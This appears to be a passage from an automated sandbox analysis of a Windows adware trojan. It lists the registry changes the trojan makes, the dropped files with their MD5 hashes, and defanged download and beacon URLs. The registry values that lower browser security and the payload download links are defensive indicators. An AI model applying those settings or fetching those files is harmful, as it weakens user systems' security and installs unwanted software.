"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 08 62 69 FB 1D D7 C3 17 99 0C 1D 7D 37 3E 0D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process 0ead95b.exe:2928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\InstalledBrowserExtensions\21836]
"70881" = "Ge-ForcePlus v3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 A8 DA 9E 27 CD 41 C9 5C 1B 0A B5 B9 42 C3 9F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836]
"70881" = "Ge-ForcePlus v3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
05c47da12b0009bd98653f51287f7768 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_14684\bxsdk32.dll
ec1562d1d3b6143db2c15fd0b7f43e55 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_14684\ins_geforce.exe
ff88aa4b5c5eee5b1ed33d88d12468ff c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_14684\ins_sense.exe
8eaa7e23e6aa005980487eb864dcaa53 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_14684\ins_shopperpro.exe
4896a79dc5d7d13664d44323a0347a75 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsb9.tmp\AccDownload.dll
faa7f034b38e729a983965c04cc70fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsb9.tmp\nsProcess.dll
904beebec2790ee2ca0c90fc448ac7e0 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsj6.tmp\D1958.dll
23c72924e6d3c5de37b9f69f9847488d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_a
921dd2e7693578fe287db2f3c3394197 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_a

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 2.8.0.999
Legal Copyright: Copyright (C) 2014
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.8.0.999
File Description:
Comments:
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 870431 870912 4.35107 a91c25802f16ed5a4c3dc74af9769a5f
.rdata 876544 260036 260096 3.00516 bb1bb3a1a95fc9690bd43050c64a73b1
.data 1138688 25064 12800 3.17973 1e20b50bab27ac331dfa83810038eb04
.rsrc 1167360 244152 244224 4.40217 ecbddcde0a476bece4704c768f4bee6b
.reloc 1413120 42964 43008 4.59598 05f867e1497d81cf4fe101c20d2b913f

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=043Mckb8Lnhw7iCtSAyu/0Q1GWwIMthwdQXWEODVVZKAMRxV Cn6lnsc7hbJtTJHDHGXB7YFOPH7H OCiIJdXed4zY8kJssz4u3oGHN86wPQVtpqSKGA7U/Xst3NHAatCNiNeNKIpAJfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxZjnXlvApvj8 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=bNFVvuIwcz4F7tXbo2OpjbeGOAxO2gKXKB2ZKuKuT4UgLxC0aXqYrUEev CIr75kJRiOVUDkXyMY3q3Uh zLol JfVwpv1Wv16XIqLxILHtgx1Ht egA6cURUFmYOWrgEoo okeITCw2Yh 7VFNWqMTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5emS9jXjFgnw= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/t.ashx?e=QgW8pN5r26byj2QAAnEFBM30ehTmVX1mQBD1m2L769FXGmhmyGgv7qkO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFWLazpewXw1jXt7qcDfFhJwTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHG6KihZpGgAn 198.232.124.192
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=bNFVvuIwcz4F7tXbo2OpjbeGOAxO2gKXKB2ZKuKuT4UgLxC0aXqYrUEev CIr75kJRiOVUDkXyMY3q3Uh zLol JfVwpv1Wv16XIqLxILHtgx1Ht egA6a3os1yMNpRF7gBtB5 kYUpdpaCi3i8nACSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJpHZ15mOZ7RI= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=bNFVvuIwcz4F7tXbo2OpjbeGOAxO2gKXKB2ZKuKuT4UgLxC0aXqYrUEev CIr75kJRiOVUDkXyMY3q3Uh zLol JfVwpv1Wv16XIqLxILHtgx1Ht egA6a3os1yMNpRFGzy5vsTaNP0Nk8MlICEx8OzO9WsNY04szUJdC7lWxx5CAq2jnzLstq5zRXoJTpQbEJGlPGkXT zLSflwInKoSsTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5emS9jXjFgnw= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=LCnUzM5l8JKBkxMrsxJdJt5jOExRmJjc8lXlmdaIM2I2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRo74r1XQZFERKa2dF0VKZsa0uea6nUoHK BPEhRyyBD7DN1CnChhvZ3S5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjm4X1w8Zq00iu0G5YLl Sb68Tidbbz5Drk= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=LCnUzM5l8JKBkxMrsxJdJt5jOExRmJjc8lXlmdaIM2I2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRo74r1XQZFERKtK2nLIJE3nATxIUcsgQ witsIrAYx7ljhVOZjHwNmMDyjESsfx8vmmA9cYundBgRv3w3Jj7cm/ gp01/jAfMwbSGNlrViJV74d 8wlC3ACe dC6ehZq jU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== 198.232.124.192
hxxp://d2bt1dcmxj05l2.cloudfront.net/ShopperProJSFull.exe 54.192.36.88
hxxp://dyd9qf154h76q.cloudfront.net/bxsdk32.dll 54.230.39.134
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FePN2I0qd4G3ExvDbcr2ZCWDFAL52sIXt4UoKtXISWiV4lHG3D5R3V5O0a/7yn1m/tGd3P3SqySAb8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rJO6tQ6g6EocBZm5XDIx10XwGDIKLmaUks= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FeOeKyAVWvB29uUFvnzEUAw6Bvyoe0Pz471eJrDcTa7BC1GOPVXIjHvBX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2Q== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FeMbGtOpbXm9kJjesXPvEdr8s IILilpWF0xztg6 4zwmphq5YRs3Ua3kOLZWZ3INLADa67vNBCQrY2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1VDoD6EkHq6EkDDzmFEVLtgFCP02w6EunE= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FePFASu7RG65lJccV0JiYKAXBPEhRyyBD7BWRKLvFc2rIXiEA2WeFUVr213KsnHgPGCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVQ6A hJB6uhJAw85hRFS7YBQj9NsOhLpx 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FeOfXhYbE9Wm3iuFUsM2slALjgb6v7cXpPvvDUPlfCzRdlPqkO/QXEWVboHDCUOFdfNUw yx3IACsY0 /eJ8LmRXU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FePPceMBfl/cy7pBWSGYE25tjgb6v7cXpPvkBonvh1TCK4JQffTeIm3ijZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2AUI/TbDoS6cQ== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FeOTRcHKuVeTpSxfMJgkYeRrKYX3Ti/i3YNxO48S9k5zx42nGtSBySjjX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2Q== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=xY8ohDYpM iI4k8LaFSbf2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMBVBPfpXcC0NNCUHeR8YCF35glrEy57w/m07ReD/zc3 EeXoYNe9IIH8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWNniPNzdiMCZhKHLVCAz6ZQsefjE2MjqpXZgKAqHEqChQ== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=xY8ohDYpM iI4k8LaFSbf2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMBHkkQ8dewzaRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KyTurUOoOhKHAWZuVwyMddF8BgyCi5mlJL 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=xY8ohDYpM iI4k8LaFSbf2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMDqVqSY7buIRtCUHeR8YCF3BQ8MIYMfS0tAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0l7tPOkkeUv 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=043Mckb8Lnhw7iCtSAyu/0Q1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FePEEASnTAt8o vdWl3XnoKt0JQd5HxgIXd4Ck/GAouPo3pu1a2/pSyUlKYWIS4b/TwQz5kcPJsPBXgEPYkm2R 4CM84BubBye2orW/U9pNYEne5haHOFLYKd5SlKONgbzwnZSRpvuXhKkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndFPhdC l28/ a9Ya/86pUpQ3MNfQbUufSXu086SR5S8= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAtaAQab8C2sQTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45uF9cPGatNIrtBuWC5fkm vE4nW28 Q65 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMC09xUUAqoccNCUHeR8YCF3RMhMhveZGB/8e7kw1yV54DHh RP9FBwluXtX58AbVGLqY0nw4ErLtxha/ J3llgZ187AT1rhu GGW2I O4PkTUw1aLHDaMdxJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovfwqbgkyABd 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAmyeS/0faBVTdVMo67fxO0s IILilpWF2Et8EPpFBXSUCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndFPhdC l28/ a9Ya/86pUpQ3MNfQbUufSXu086SR5S8= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAmyeS/0faBVTdVMo67fxO0s IILilpWF1B5eyhynK5il gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBd7kwVzNWOrfuirThnOyWCqILJt Jqyltk= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAmyeS/0faBVTdVMo67fxO0s IILilpWF0JzvOmbeJDXy5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjm4X1w8Zq00iu0G5YLl Sb68Tidbbz5Drk= 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAmyeS/0faBVTdVMo67fxO0s IILilpWF0vmoXMQKU1KtudqV021AKZU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=oE Olq3N8DJENRlsCDLYcDgfC1V7eKoWgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEaTBgykGtBXjxBAEp0wLfKOWnHKXQ4ByT9CUHeR8YCF3cICI7/tQlejZeojEglKF4ySWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qL38Km4JMgAXQ== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=oE Olq3N8DJENRlsCDLYcDgfC1V7eKoWgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEaTBgykGtBXjxBAEp0wLfKOcXM978RrvxgTxIUcsgQ w0eteH8KxBtakHX utQO2t7GJ7NLKRj9nU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== 198.232.124.192
hxxp://yk9s88xsxo-zxis6jz8.netdna-ssl.com/27136.ashx?e=oE Olq3N8DJENRlsCDLYcDgfC1V7eKoWgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEaTBgykGtBXjGxrTqW15vZAooxpS5ufgquJVjHmrT0TCdGBVM3gUbVwDpXxHWgmjuq9qGTCPFxGMacNTVL60tsKrgHWJBZg2eTkxN6pxw89Ap19bfV/XketHQPSr00xn/pt5BjWOuab4BLZMo3KhL4A7oa41N9YhxikzL8hyzXRMc0g1gcxjite /Y3KN3CLINidK03d0MuzZPHJU0qA9vA9GanF1RNNmMzXUezINFlsIV5dJNE8xQtEL6kO6MAPPRk3pYsWha92dV1 PcKMtTouTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45uF9cPGatNIrtBuWC5fkm vE4nW28 Q65 198.232.124.192
